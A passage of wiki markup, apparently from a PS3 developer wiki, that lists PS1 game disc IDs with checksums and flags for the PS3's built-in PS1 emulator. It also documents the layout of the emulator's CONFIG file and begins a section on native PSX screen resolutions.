/> | SLUS_002.71 || Usa || || || 4 || 8c5b703d || 0000000300000320 || <br /> |-<br /> | SLUS_002.72 || Usa || || || 4 || f4a37003 || 0000000300000320 || <br /> |-<br /> | SLUS_002.73 || Usa || || || 4 || 5877031 || 0000000300000320 || <br /> |-<br /> | SLUS_000.76 || Usa || || || 1 || 7e91728c || 0000001200000006 || <br /> |-<br /> | SLUS_000.28 || Usa || || || 1 || 64d8758d || 0000001200000006 || <br /> |-<br /> | SLUS_001.37 || Usa || || || 1 || cae576e7 || 0000001200000006 || <br /> |-<br /> | SCUS_944.48 || Usa || || || 1 || 68537091 || 0000002e00000002 || <br /> |-<br /> | SLUS_012.53 || Usa || || || 1 || 4a926d54 || 0000001000000020 || <br /> |-<br /> | SLUS_012.54 || Usa || || || 1 || 5c3d6fd0 || 0000001000000020 || <br /> |-<br /> | SLUS_004.33 || Usa || || || 1 || 34fa737c || 0000000100000001 || <br /> |-<br /> | SCUS_944.54 || Usa || || || 1 || 49486d8e || 0000000400000258 || <br /> |-<br /> | SCUS_942.00 || Usa || || || 1 || e9575ed || 00000019000002bc || <br /> |-<br /> |}<br /> <br /> ===== TitleID/DiscID in ps1_newemu =====<br /> {|class=&quot;wikitable sortable&quot;<br /> |-<br /> ! ID in newemu.self !! Region !! DiscID !! Title !! unk !! checksum !! flags !! FW<br /> |-<br /> | SLPS_023.64 || || || || 1 || 40b572aa || 0000001800000003 || <br /> |-<br /> | SLPS_023.65 || || || || 1 || 55e87206 || 0000001800000003 || <br /> |-<br /> | SLPM_860.28 || || || || 1 || 770f6f03 || 0000001800000003 || <br /> |-<br /> | SLPS_000.13 || || || || 3 || 9dc97376 || 00000005000000c8 || <br /> |-<br /> | SLPS_023.61 || || || || 1 || c1556eb3 || 0000000100000001 || <br /> |-<br /> | SLPS_013.43 || || || || 1 || 2b2270f6 || 0000000100000080 || <br /> |-<br /> | SLPS_007.70 || || || || 1 || ba3573e7 || 0000000100000010 || <br /> |-<br /> | SLPS_017.72 || || || || 2 || 3e6e7597 || 00000013fffffa00 || <br /> |-<br /> | SLPS_035.02 || || || || 1 || 32256c55 || 0000001800000003 || <br /> |-<br /> | SLPS_023.71 || || || || 1 || d59774b8 || 0000000100000020 || <br /> |-<br /> | SLPS_007.50 || || || || 1 || edad71d8 || 0000000100000040 || <br /> |-<br /> | SLPS_007.00 || || || || 1 || 14dd7664 || 0000000100000040 || <br /> |-<br /> | SLPS_008.30 || || || || 1 || 9ea572ab || 0000000100010000 || <br /> |-<br /> | SLPM_862.26 || || || || 1 || d9fb6e40 || 00000013fffff700 || <br /> |-<br /> | SLPS_034.95 || || || || 2 || 76fa6c8f || 0000001400000001 || <br /> |-<br /> | SLPM_861.62 || || || || 1 || 171a6e8c || 0000000400000708 || <br /> |-<br /> | SLPM_861.62 || || || || 1 || 3b716e92 || 0000000400000708 || <br /> |-<br /> | SCPS_100.92 || || || || 1 || 985c6d1c || 0000000100010000 || <br /> |-<br /> | SLPM_870.56 || || || || 1 || c18c6d68 || 0000000100010000 || <br /> |-<br /> | SLPS_014.34 || || || || 1 || 33196d96 || 0000000100010000 || <br /> |-<br /> | SLPS_021.08 || || || || 2 || fee172c6 || 0000000200000000 || <br /> |-<br /> | SLPS_021.09 || || || || 2 || ecb1743a || 0000000200000000 || <br /> |-<br /> | SLPS_022.27 || || || || 1 || 8212727f || 0000000100010000 || <br /> |-<br /> | SLPS_027.36 || || || || 1 || 24bc6f0e || 0000000100010000 || <br /> |-<br /> | SLPS_000.40 || || || || 1 || 3a6f72f5 || 0000000100010000 || <br /> |-<br /> | SLPS_014.21 || || || || 1 || 5e466c72 || 0000001800000003 || <br /> |-<br /> | SLPM_864.90 || || || || 1 || e94570d4 || 0000000100010000 || <br /> |-<br /> | SLPS_007.52 || || || || 1 || 40a7270 || 0000000100010000 || <br /> |-<br /> | SLPS_003.04 || || || || 1 || 2d507191 || 0000000100010000 || <br /> |-<br /> | SLPS_003.04 || || || || 1 || b4570c7 || 0000000100010000 || <br /> |-<br /> | SLPS_003.05 || || || || 1 || 2f7c6d6c || 0000000100010000 || <br /> |-<br /> | SLPM_860.97 || || || || 1 || c15f7120 || 0000000100010000 || <br /> |-<br /> | SLPM_860.98 || || || || 1 || eb946d0a || 0000000100010000 || <br /> |-<br /> | SLPS_016.09 || || || || 1 || 60f06ea0 || 0000000100010000 || <br /> |-<br /> | SLPS_016.10 || || || || 1 || e90a6ce3 || 0000000100010000 || <br /> |-<br /> | SLPS_024.12 || || || || 1 || ab3b70e7 || 0000000100010000 || <br /> |-<br /> | SLPS_025.70 || || || || 2 || c47c6d81 || 0000000200000000 || <br /> |-<br /> | SLPS_025.71 || || || || 2 || 1ede6edc || 0000000200000000 || <br /> |-<br /> | SLPS_016.83 || || || || 1 || 7ffa79b2 || 0000000100010000 || <br /> |-<br /> | SLPS_010.08 || || || || 2 || a72b7071 || 0000000100010000 || <br /> |-<br /> | SLPS_023.68 || || || || 1 || 12e17661 || 0000000100010000 || <br /> |-<br /> | SLPS_024.60 || || || || 2 || aa1473a6 || 0000000200000000 || <br /> |-<br /> | SLPS_024.61 || || || || 2 || 8cb57276 || 0000000200000000 || <br /> |-<br /> | SLPS_024.62 || || || || 2 || 344473b8 || 0000000200000000 || <br /> |-<br /> | SLPS_024.63 || || || || 2 || 689a72b4 || 0000000200000000 || <br /> |-<br /> | SCPS_101.36 || || || || 2 || aa4070a9 || 0000000100010000 || <br /> |-<br /> | SLPS_017.17 || || || || 1 || ead56ab7 || 0000000100010000 || <br /> |-<br /> | SLPS_001.94 || || || || 1 || b01d7540 || 0000000b00000002 || <br /> |-<br /> | SLPS_005.50 || || || || 1 || 77327123 || 0000000f00063fe1 || <br /> |-<br /> | SLPS_005.50 || || || || 1 || 505971b4 || 0000000f00063fe1 || <br /> |-<br /> | SLPS_007.87 || || || || 1 || cf9d72df || 0000000f00063fe1 || <br /> |-<br /> | SLPM_863.81 || || || || 1 || f04b7147 || 0000000f1090c229 || <br /> |-<br /> | SLPS_004.77 || || || || 1 || 448373e5 || 0000000c00000001 || <br /> |-<br /> | SLPS_016.11 || || || || 1 || 68ed73d3 || 0000000b00000004 || <br /> |-<br /> | SLPM_862.68 || || || || 2 || d046df5 || 0000001500000001 || <br /> |-<br /> | SLPM_862.68 || || || || 2 || 5af46e00 || 0000001500000001 || <br /> |-<br /> | SLPS_017.74 || || || || 1 || affd73f0 || 0000000100000001 || <br /> |-<br /> | SLPS_005.55 || || || || 1 || 9faf7086 || 00000006000000c8 || <br /> |-<br /> | SLPM_863.17 || || || || 1 || 4e437226 || 0000000700000064 || <br /> |-<br /> | unknown || || || || 1 || cf07737f || 0000000900000004 || <br /> |-<br /> | unknown || || || || 1 || 18fd70a4 || 0000000b00000004 || <br /> |-<br /> | SLPS_017.60 || || || || 1 || c24577b9 || 0000000b00000004 || <br /> |-<br /> | SLPS_013.24 || || || || 1 || 5a7f712a || 0000000100000080 || <br /> |-<br /> | SLPS_004.58 || || || || 1 || 9f7d6e65 || 0000000100000200 || <br /> |-<br /> | SLPS_008.31 || || || || 1 || b3127504 || 0000000b00000004 || <br /> |-<br /> | SLPS_005.90 || || || || 1 || c0d67577 || 0000000b00000004 || <br /> |-<br /> | SLPS_023.07 || || || || 1 || efba6dcf || 0000000100000001 || <br /> |-<br /> | SLPS_014.03 || || || || 1 || 12345678 || 0000000000000000 || <br /> |-<br /> | SLPS_014.04 || || || || 1 || 12345678 || 0000000000000000 || <br /> |-<br /> | SLPS_018.68 || || || || 1 || 70f6ca5 || 0000000100000001 || <br /> |-<br /> | SLPS_180.12 || || || || 1 || dbb96c5c || 0000001600000001 || <br /> |-<br /> | SLPS_008.86 || || || || 1 || f19370b0 || 00000006000000c8 || <br /> |-<br /> | SLPS_004.17 || || || || 2 || f4066f09 || 000000060000015e || <br /> |-<br /> | SLPS_024.77 || || || || 2 || c2ef79a5 || 000000060000015e || <br /> |-<br /> | SLPS_006.14 || || || || 1 || aeaf7108 || 00000006000000c8 || <br /> |-<br /> | SLPS_006.38 || || || || 1 || 4ebd7ccc || 00000006000000c8 || <br /> |-<br /> | SLPS_026.13 || || || || 1 || 46e77197 || 0000000100000080 || <br /> |-<br /> | unknown || || || || 1 || 53af6af9 || 0000000100000001 || <br /> |-<br /> | SLPS_031.61 || || || || 1 || 942c7422 || 0000000100000001 || <br /> |-<br /> | SLPM_867.65 || || || || 1 || f4ee737d || 0000000100000001 || <br /> |-<br /> | SCPS_100.37 || || || || 3 || c139700e || 0000000100010500 || <br /> |-<br /> | SLPM_865.44 || || || || 2 || de0d72b7 || 0000000200000000 || <br /> |-<br /> | SLPS_018.75 || || || || 1 || 73cc6be9 || 00000013fffff700 || <br /> |-<br /> | SLPS_005.65 || || || || 1 || 7fe57339 || 0000000100000080 || <br /> |-<br /> | SLPS_023.20 || || || || 1 || 93677288 || 0000000100000400 || <br /> |-<br /> | SLPS_009.03 || || || || 1 || a8a3704c || 0000001500000001 || <br /> |-<br /> | SLPS_910.19 || || || || 3 || f6d3736d || 0000000200000000 || <br /> |-<br /> | SLPM_871.17 || || || || 1 || 51e66f74 || 0000000100000001 || <br /> |-<br /> | SCPS_100.26 || || || || 1 || ec156e17 || 0000000100020000 || <br /> |-<br /> | SLPM_860.85 || || || || 2 || 41bf6ff7 || 0000000100010000 || <br /> |-<br /> | SLPM_867.67 || || || || 1 || 88c36d50 || 0000000dffffffb5 || <br /> |-<br /> | SLPM_865.23 || || || || 1 || 49347190 || 0000000dffffffc4 || <br /> |-<br /> | SLPS_006.40 || || || || 2 || 41c872d2 || 0000000100010081 || <br /> |-<br /> | SLPS_011.71 || || || || 2 || 3c5e7167 || 0000000100010081 || <br /> |-<br /> | SLPM_860.84 || || || || 2 || fce56ce6 || 0000000100010081 || <br /> |-<br /> | SLPS_008.34 || || || || 2 || e0e87232 || 0000000100010081 || <br /> |-<br /> | SLPM_862.01 || || || || 2 || 49d86eac || 0000000100010081 || <br /> |-<br /> | SLPS_910.24 || || || || 2 || 88f16e6c || 0000000100010081 || <br /> |-<br /> | SCPS_101.03 || || || || 1 || 6e516dad || 0000001800000003 || <br /> |-<br /> | SLPS_009.50 || || || || 1 || a2a96eb5 || 0000000b00000008 || <br /> |-<br /> | SLPS_030.12 || || || || 2 || 24857336 || 0000000e00000032 || <br /> |-<br /> | SLPS_019.02 || || || || 5 || a0926c45 || 0000000100010100 || <br /> |-<br /> | SCPS_100.03 || || || || 1 || ed04760d || 0000001800000003 || <br /> |-<br /> | SLPS_000.28 || || || || 3 || 6087000 || 0000000100010100 || <br /> |-<br /> | SLPS_017.49 || || || || 2 || b29d7153 || 0000000100010081 || <br /> |-<br /> | SCPS_100.81 || || || || 1 || 4c9d708c || 0000000100020000 || <br /> |-<br /> | SCPS_101.06 || || || || 1 || 53226b9c || 0000001800000003 || <br /> |-<br /> | SCPS_101.07 || || || || 1 || 90f76b40 || 0000001800000003 || <br /> |-<br /> | SCPS_100.89 || || || || 4 || e39f71b3 || 0000001500000001 || <br /> |-<br /> | SCPS_100.90 || || || || 4 || 68d771a3 || 0000001500000001 || <br /> |-<br /> | SCPS_100.29 || || || || 3 || 20e06dd4 || 0000000100010081 || <br /> |-<br /> | SCPS_100.50 || || || || 1 || 50ec6c67 || 0000001800000003 || <br /> |-<br /> | SCPS_100.31 || || || || 2 || 94996ff8 || 0000000100010000 || <br /> |-<br /> | SCPS_100.39 || || || || 2 || e46f6d51 || 0000000100010000 || <br /> |-<br /> | SLPS_914.44 || || || || 1 || b9317410 || 0000001800000003 || <br /> |-<br /> | SLPS_914.45 || || || || 1 || c1007411 || 0000001800000003 || <br /> |-<br /> | SCPS_100.77 || || || || 1 || 2afd6ca6 || 0000001700000001 || <br /> |-<br /> | SCPS_100.78 || || || || 1 || e6566cfc || 0000001700000001 || <br /> |-<br /> | SLPS_026.52 || || || || 2 || 75847283 || 0000000100010000 || <br /> |-<br /> | SLPS_018.80 || || || || 1 || d8446e20 || 0000001800000003 || <br /> |-<br /> | SLPS_018.81 || || || || 1 || d4c76d1b || 0000001800000003 || <br /> |-<br /> | SLPS_018.82 || || || || 1 || 18126e07 || 0000001800000003 || <br /> |-<br /> | SLPS_018.83 || || || || 1 || 12376e34 || 0000001800000003 || <br /> |-<br /> | SIPS_600.21 || || || || 1 || 9bf76dc2 || 0000001800000003 || <br /> |-<br /> | SLPS_000.69 || || || || 1 || 855d7198 || 0000001800000003 || <br /> |-<br /> | SLPS_023.89 || || || || 1 || df2a6ce3 || 0000001800000003 || <br /> |-<br /> | SLPM_860.62 || || || || 1 || 9f927356 || 0000001800000003 || <br /> |-<br /> | SLPM_860.47 || || || || 1 || 156670d4 || 0000001800000003 || <br /> |-<br /> | SLPM_866.46 || || || || 1 || b0a707c || 0000001800000003 || <br /> |-<br /> | SLPS_017.93 || || || || 1 || 4fa46da5 || 0000001800000003 || <br /> |-<br /> | SCPS_180.11 || || || || 1 || 286070c5 || 0000001800000003 || <br /> |-<br /> | SLPS_003.59 || || || || 1 || 27b270f4 || 0000001800000003 || <br /> |-<br /> | SIPS_600.20 || || || || 1 || 50ed6e47 || 0000001800000003 || <br /> |-<br /> | SLPM_864.61 || || || || 1 || 65b76bdc || 0000001800000003 || <br /> |-<br /> | SLPS_021.57 || || || || 1 || ff40721f || 0000001800000003 || <br /> |-<br /> | SLPS_026.33 || || || || 1 || 1a696e28 || 0000001800000003 || <br /> |-<br /> | SLPM_870.82 || || || || 1 || b9037041 || 0000001800000003 || <br /> |-<br /> | SLPS_029.88 || || || || 1 || 3fad6f38 || 0000001800000003 || <br /> |-<br /> | SLPS_012.99 || || || || 1 || e9a46c06 || 0000001800000003 || <br /> |-<br /> | SLPS_004.02 || || || || 1 || d1c27360 || 0000001800000003 || <br /> |-<br /> | SCPS_101.26 || || || || 1 || f25b6d85 || 0000001800000003 || <br /> |-<br /> | SLPS_007.67 || || || || 1 || 44fb717d || 0000001800000003 || <br /> |-<br /> | SLPS_011.60 || || || || 1 || b5d72f3 || 0000001800000003 || <br /> |-<br /> | SLPS_011.61 || || || || 1 || 44ab7211 || 0000001800000003 || <br /> |-<br /> | SLPS_600.01 || || || || 1 || 856073a0 || 0000001800000003 || <br /> |-<br /> | SCPS_101.15 || || || || 1 || 56086c54 || 0000001800000003 || <br /> |-<br /> | SCPS_101.33 || || || || 1 || 49a66cd5 || 0000001800000003 || <br /> |-<br /> | SLPM_865.40 || || || || 1 || cb0b736e || 0000001800000003 || <br /> |-<br /> | SLPS_004.09 || || || || 1 || 45646d3d || 0000001800000003 || <br /> |-<br /> | SLPS_002.63 || || || || 1 || a98d735a || 0000001800000003 || <br /> |-<br /> | SLPS_002.05 || || || || 1 || b04716c || 0000001800000003 || <br /> |-<br /> | SLPS_002.07 || || || || 1 || 6d4770d1 || 0000001800000003 || <br /> |-<br /> | SCPS_101.29 || || || || 1 || 9b4e6ef0 || 0000001800000003 || <br /> |-<br /> | SCPS_101.38 || || || || 1 || 1d826df0 || 0000001800000003 || <br /> |-<br /> | SLPS_911.10 || || || || 1 || 6b187157 || 0000001800000003 || <br /> |-<br /> | SCPS_100.27 || || || || 1 || fdc66cce || 0000000100000080 || <br /> |-<br /> | SLPS_911.80 || || || || 1 || 8047091 || 0000001800000003 || <br /> |-<br /> | SLPM_861.48 || || || || 2 || 42646c0f || 0000000100010081 || <br /> |-<br /> | SLPM_866.02 || || || || 1 || 5a746ec3 || 0000001800000003 || <br /> |-<br /> | SLPS_005.82 || || || || 1 || ba436ecc || 0000001800000003 || <br /> |-<br /> | SLPM_862.24 || || || || 1 || 43406d6f || 0000001500000001 || <br /> |-<br /> | SLPM_862.25 || || || || 1 || 8f686d14 || 0000001500000001 || <br /> |-<br /> | SCPS_101.18 || || || || 1 || 7b467173 || 0000001800000003 || <br /> |-<br /> | SLPM_004.06 || || || || 1 || e49c6d4a || 0000001500000001 || <br /> |-<br /> | SCPS_100.64 || || || || 1 || 3d576c00 || 0000001800000003 || <br /> |-<br /> | SLPM_860.72 || || || || 1 || 4373729f || 0000001800000003 || <br /> |-<br /> | SCPS_100.11 || || || || 1 || c9216ded || 0000001500000001 || <br /> |-<br /> | SLPS_017.50 || || || || 1 || 5d6c741f || 0000001800000003 || <br /> |-<br /> | SLPM_862.72 || || || || 1 || ab736ebf || 0000001800000003 || <br /> |-<br /> | SLPM_005.88 || || || || 1 || 9fe47419 || 0000001800000003 || <br /> |-<br /> | SLPM_010.13 || || || || 1 || f01b6f91 || 0000001800000003 || <br /> |-<br /> | SLPM_005.55 || || || || 1 || 1fd7071 || 0000001800000003 || <br /> |-<br /> | SLPS_014.90 || || || || 1 || eb317234 || 0000001800000003 || <br /> |-<br /> | SLPS_013.48 || || || || 1 || d59c6ed3 || 0000001800000003 || <br /> |-<br /> | SLPM_861.92 || || || || 1 || b0c26e33 || 0000001800000003 || <br /> |-<br /> | SLPS_022.20 || || || || 1 || 82b77236 || 0000001800000003 || <br /> |-<br /> | SLPS_022.55 || || || || 1 || 2f1972cf || 0000001800000003 || <br /> |-<br /> | SLPS_012.89 || || || || 1 || f0f26cd8 || 0000001800000003 || <br /> |-<br /> | SLPS_021.70 || || || || 1 || 30986d99 || 0000001800000003 || <br /> |-<br /> | SLPS_022.22 || || || || 1 || 1e26b5e || 0000001800000003 || <br /> |-<br /> | SLPS_004.97 || || || || 1 || d70b70ab || 0000001800000003 || <br /> |-<br /> | SLPS_012.94 || || || || 1 || 6e836d1b || 0000001800000003 || <br /> |-<br /> | SLPM_860.20 || || || || 1 || 75066d16 || 0000001800000003 || <br /> |-<br /> | SLPM_862.63 || || || || 1 || b05070c5 || 0000001800000003 || <br /> |-<br /> | SLPS_026.61 || || || || 1 || c49b6f05 || 0000001800000003 || <br /> |-<br /> | SLPS_026.62 || || || || 1 || 6d7d6f1b || 0000001800000003 || <br /> |-<br /> | SLPS_010.11 || || || || 1 || 2b347278 || 0000001800000003 || <br /> |-<br /> | SLPS_026.20 || || || || 1 || 1a5b7265 || 0000001800000003 || <br /> |-<br /> | SLPS_026.21 || || || || 1 || c3157410 || 0000001800000003 || <br /> |-<br /> | SLPM_864.39 || || || || 1 || 42626b79 || 0000001800000003 || <br /> |-<br /> | SLPM_860.18 || || || || 1 || b7206ec6 || 0000001800000003 || <br /> |-<br /> | SLPS_014.86 || || || || 1 || 65697416 || 0000001800000003 || <br /> |-<br /> | SLPS_014.20 || || || || 1 || fc4671f3 || 0000001800000003 || <br /> |-<br /> | SIPS_600.22 || || || || 1 || c8a16e05 || 0000001800000003 || <br /> |-<br /> | SCPS_100.93 || || || || 1 || a0546cf8 || 0000001800000003 || <br /> |-<br /> | SLPS_021.67 || || || || 1 || e8336ff5 || 0000001800000003 || <br /> |-<br /> | SLPS_012.22 || || || || 1 || 7d8d73b7 || 0000001800000003 || <br /> |-<br /> | SLPS_012.23 || || || || 1 || 32ee71ee || 0000001800000003 || <br /> |-<br /> | SLPS_006.17 || || || || 1 || d780729c || 0000001800000003 || <br /> |-<br /> | SLPS_863.63 || || || || 1 || d40f7363 || 0000001800000003 || <br /> |-<br /> | SCPS_101.12 || || || || 1 || 9d7e6dc3 || 0000001800000003 || <br /> |-<br /> | SCPS_101.13 || || || || 1 || dae26dcb || 0000001800000003 || <br /> |-<br /> | SCPS_101.14 || || || || 1 || 64306ea5 || 0000001800000003 || <br /> |-<br /> | SLPS_031.60 || || || || 1 || 3c797083 || 0000001800000003 || <br /> |-<br /> | SLPS_034.30 || || || || 1 || ab316db4 || 0000001800000003 || <br /> |-<br /> | SLPS_034.37 || || || || 1 || df5e6d6f || 0000001800000003 || <br /> |-<br /> | SLPS_010.57 || || || || 1 || 14117645 || 0000001800000003 || <br /> |-<br /> | SLPS_010.58 || || || || 1 || e19b76e4 || 0000001800000003 || <br /> |-<br /> | SLPS_010.59 || || || || 1 || fd807358 || 0000001800000003 || <br /> |-<br /> | SLPS_010.60 || || || || 1 || 24ad75d6 || 0000001800000003 || <br /> |-<br /> | SLPS_018.53 || || || || 1 || 9d4473e4 || 0000001800000003 || <br /> |-<br /> | SCPS_100.47 || || || || 1 || 56d97048 || 0000001800000003 || <br /> |-<br /> | SLPS_033.12 || || || || 1 || a0ce6ca9 || 0000001800000003 || <br /> |-<br /> | SLPM_861.85 || || || || 1 || ebaf6f5d || 0000001800000003 || <br /> |-<br /> | SLPM_861.86 || || || || 1 || 3e696c8a || 0000001800000003 || <br /> |-<br /> | SLPM_861.87 || || || || 1 || 81d86e23 || 0000001800000003 || <br /> |-<br /> | SCPS_100.99 || || || || 1 || 9502715f || 0000001800000003 || <br /> |-<br /> | SCPS_100.73 || || || || 1 || 73e06e8f || 0000001800000003 || <br /> |-<br /> | SLPM_866.40 || || || || 1 || f9db6f2d || 0000001800000003 || <br /> |-<br /> | SLPS_023.00 || || || || 1 || 9b397352 || 0000001800000003 || <br /> |-<br /> | SLPS_024.89 || || || || 1 || 8f4676c6 || 0000001800000003 || <br /> |-<br /> | SLPS_030.87 || || || || 1 || 30f078ac || 0000001800000003 || <br /> |-<br /> | SCPS_100.60 || || || || 1 || 4bca6fd6 || 0000001800000003 || <br /> |-<br /> | SCPS_100.87 || || || || 1 || 7bfd7166 || 0000001800000003 || <br /> |-<br /> | SLPS_004.00 || || || || 1 || 81174c2 || 0000001800000003 || <br /> |-<br /> | SLPM_860.33 || || || || 1 || 1b467259 || 0000001800000003 || <br /> |-<br /> | SLPS_007_17 || || || || 1 || 9f01700a || 0000001800000003 || <br /> |-<br /> | SLPS_010_00 || || || || 1 || 123270ee || 0000001800000003 || <br /> |-<br /> | SLPM_873_31 || || || || 1 || fda96f69 || 0000001800000003 || <br /> |-<br /> | SLES_036.30 || || || || 1 || 2f872b9 || 0000000100000001 || <br /> |-<br /> | SLES_021.70 || || || || 1 || 46846f41 || 0000000100000001 || <br /> |-<br /> | SLES_028.65 || || || || 1 || 402a6cc3 || 0000000100000001 || <br /> |-<br /> | SLES_037.36 || || || || 1 || 49f87116 || 0000000100010000 || <br /> |-<br /> | SCES_016.95 || || || || 1 || 1cd06fbd || 0000000a000089ea || <br /> |-<br /> | SLES_019.07 || || || || 2 || 217f73b9 || 0000000a0000c0ee || <br /> |-<br /> | SLES_026.89 || || || || 1 || 697a6c9d || 0000000100000100 || <br /> |-<br /> | SLES_013.01 || || || || 1 || d3e2755e || 0000000a0000b722 || <br /> |-<br /> | SLES_000.99 || || || || 1 || 545b76f8 || 0000000100000080 || <br /> |-<br /> | SLES_018.16 || || || || 1 || 9f5d70fb || 0000000100000080 || <br /> |-<br /> | SLES_007.46 || || || || 1 || 9c1c6cb8 || 0000000100010000 || <br /> |-<br /> | SLES_025.38 || || || || 1 || b90c6c42 || 00000006000000c8 || <br /> |-<br /> | SCES_021.04 || || || || 3 || e57f6d26 || 0000000100010100 || <br /> |-<br /> | SCES_003.11 || || || || 1 || d0317129 || 0000001800000003 || <br /> |-<br /> | SCES_022.85 || || || || 1 || e8466f95 || 0000001800000003 || <br /> |-<br /> | SCES_122.85 || || || || 1 || 85fe6e5c || 0000001800000003 || <br /> |-<br /> | SLES_008.55 || || || || 1 || 236a72b5 || 0000001800000003 || <br /> |-<br /> | SLES_108.55 || || || || 1 || 4fc67214 || 0000001800000003 || <br /> |-<br /> | SLES_000.82 || || || || 1 || 7137379 || 0000001800000003 || <br /> |-<br /> | SLES_100.82 || || || || 1 || b7b67390 || 0000001800000003 || <br /> |-<br /> | SLES_008.09 || || || || 1 || a28f6de2 || 0000001800000003 || <br /> |-<br /> | SCES_010.00 || || || || 1 || 45a36e7f || 0000001800000003 || <br /> |-<br /> | SLES_024.70 || || || || 1 || 5c746f43 || 0000001800000003 || <br /> |-<br /> | SLES_000.24 || || || || 1 || 20a071df || 0000001800000003 || <br /> |-<br /> | SCES_028.73 || || || || 1 || 5aad6cad || 0000001800000003 || <br /> |-<br /> | SCES_021.05 || || || || 1 || 24066f28 || 0000001800000003 || <br /> |-<br /> | SLES_018.16 || || || || 1 || 9f5d70fb || 0000001800000003 || <br /> |-<br /> | SLUS_013.82 || || || || 1 || ae74739a || 0000000100000001 || <br /> |-<br /> | SLUS_010.41 || || || || 1 || a69371a0 || 0000000100000001 || <br /> |-<br /> | SLUS_010.80 || || || || 1 || 868e72c8 || 0000000100000001 || <br /> |-<br /> | SLUS_013.91 || || || || 1 || c8777043 || 0000000100010000 || <br /> |-<br /> | SLUS_006.31 || || || || 1 || 23877090 || 0000000100000080 || <br /> |-<br /> | SLUS_008.62 || || || || 1 || 607074ae || 0000000100000001 || <br /> |-<br /> | SLUS_000.19 || || || || 1 || 32fe7217 || 0000000c00000001 || <br /> |-<br /> | SLUS_005.53 || || || || 1 || 1c62708d || 0000000000000000 || <br /> |-<br /> | SLUS_005.54 || || || || 1 || 8c9670e0 || 0000000000000000 || <br /> |-<br /> | SLUS_011.04 || || || || 1 || 2cf66cd6 || 0000000100000100 || <br /> |-<br /> | SCUS_945.08 || || || || 1 || 18d56d2a || 0000000300000002 || <br /> |-<br /> | SCUS_949.00 || || || || 1 || 124f71ad || 0000000300000002 || <br /> |-<br /> | SCUS_943.09 || || || || 2 || a9c66fe4 || 0000000300000002 || <br /> |-<br /> | SCUS_941.03 || || || || 1 || df4c6dbb || 0000000300000002 || <br /> |-<br /> | SLUS_002.13 || || || || 1 || cff7372 || 0000000300000002 || <br /> |-<br /> | SCUS_943.02 || || || || 1 || 7e67394 || 0000000300000002 || <br /> |-<br /> | SCUS_944.76 || || || || 1 || f7656d79 || 0000000300000002 || <br /> |-<br /> | SCUS_943.01 || || || || 1 || 24f17103 || 0000000300000002 || <br /> |-<br /> | SCUS_943.56 || || || || 1 || 776872c1 || 0000000300000002 || <br /> |-<br /> | SCUS_942.40 || || || || 1 || 4b39703c || 0000001300000960 || <br /> |-<br /> | SCUS_942.27 || || || || 2 || f6087105 || 0000000100010101 || <br /> |-<br /> | SLUS_009.58 || || || || 1 || 70356caf || 0000001800000003 || <br /> |-<br /> | SCUS_944.26 || || || || 1 || 24f37297 || 0000001800000003 || <br /> |-<br /> | SCUS_944.67 || || || || 1 || eafb6e78 || 0000001800000003 || <br /> |-<br /> | SLUS_002.92 || || || || 1 || 93956d84 || 0000001800000003 || <br /> |-<br /> | SCUS_943.04 || || || || 1 || c0546d88 || 0000001800000003 || <br /> |-<br /> | SCUS_944.25 || || || || 1 || 8d1c6ed8 || 0000001800000003 || <br /> |-<br /> | SCUS_946.40 || || || || 1 || 652c6e7f || 0000001800000003 || <br /> |-<br /> | SLUS_002.58 || || || || 1 || 35097499 || 0000001800000003 || <br /> |-<br /> | SLUS_008.21 || || || || 1 || 5fa77106 || 0000001800000003 || <br /> |-<br /> | SLUS_001.52 || || || || 1 || 59207131 || 0000001800000003 || <br /> |-<br /> | SCUS_944.91 || || || || 1 || b5e6789a || 0000001800000003 || <br /> |-<br /> | SCUS_945.84 || || || || 1 || 1ff37a84 || 0000001800000003 || <br /> |-<br /> | SCUS_945.85 || || || || 1 || 9df3795c || 0000001800000003 || <br /> |-<br /> | SCUS_945.86 || || || || 1 || 28f77a7c || 0000001800000003 || <br /> |-<br /> | SLUS_009.74 || || || || 1 || 1a1d6f39 || 0000001800000003 || <br /> |-<br /> | SLUS_012.70 || || || || 1 || 7c126fa0 || 0000001800000003 || <br /> |-<br /> | SCUS_947.76 || || || || 1 || f7656d79 || 0000001800000003 || <br /> |-<br /> | SLUS_004.37 || || || || 1 || cb24738b || 0000001800000003 || <br /> |-<br /> | SLUS_002.38 || || || || 1 || 4c1c7189 || 0000000300000002 || <br /> |-<br /> | SLUS_001.13 || || || || 1 || f2bd6ee2 || 0000000300000002 || <br /> |-<br /> | SLUS_002.36 || || || || 1 || c1117292 || 0000000300000002 || <br /> |-<br /> | SLUS_005.18 || || || || 1 || d212739f || 0000000300000002 || <br /> |-<br /> | SLUS_004.40 || || || || 1 || e28f729a || 0000000300000002 || <br /> |-<br /> | SLUS_000.61 || || || || 1 || e1b4752c || 0000000300000002 || <br /> |-<br /> |}<br /> <br /> http://www.ps3hax.net/showpost.php?p=261592&amp;postcount=1264<br /> <br /> === CONFIG ===<br /> <br /> Created by the Emulator at path: /USRDIR/CONFIG<br /> <br /> Content: <br /> &lt;pre&gt;<br /> 00000000 1C 00 00 00 50 53 31 45 6D 75 43 6F 6E 66 69 67 ....PS1EmuConfig<br /> 00000010 46 69 6C 65 00 97 0A 54 04 00 00 00 01 00 00 00 File...T........<br /> 00000020 0F D4 CC B9 10 00 00 00 64 69 73 63 5F 6E 6F 00 ........disc_no.<br /> 00000030 04 00 00 00 00 00 00 00 93 D1 5B F8 ..........[. <br /> &lt;/pre&gt;<br /> <br /> <br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Offset !! size !! data !! notes<br /> |-<br /> | 0x00 || 0x04 || 1C 00 00 00 || size of content<br /> |-<br /> | 0x04 || 0x14 || &quot;PS1EmuConfigFile&quot; ||<br /> |-<br /> | 0x18 || 0x04 || 00 97 0A 54 ||<br /> |-<br /> | 0x1C || 0x04 || 01 00 00 00 ||<br /> |-<br /> | 0x20 || 0x04 || 0F D4 CC B9 || crc<br /> |-<br /> | 0x24 || 0x04 || 10 00 00 00 || size of content<br /> |-<br /> | 0x28 || 0x08 || &quot;disc_no&quot; ||<br /> |-<br /> | 0x30 || 0x04 || 04 00 00 00 || amount of discs<br /> |-<br /> | 0x34 || 0x04 || 00 00 00 00 || disc number<br /> |-<br /> | 0x38 || 0x04 || 93 D1 5B F8 || crc<br /> |-<br /> |}<br /> <br /> === Resolution ===<br /> <br /> ==== PSX Native resolution ====<br /> Games are always 4:3 with any resolution between 640x480 NTSC / 640x512 PAL (the bios initialisation screen) and lower:<br /> * Horizontal: 256 (rare e.g. Dragon Warrior VII), 320, 368 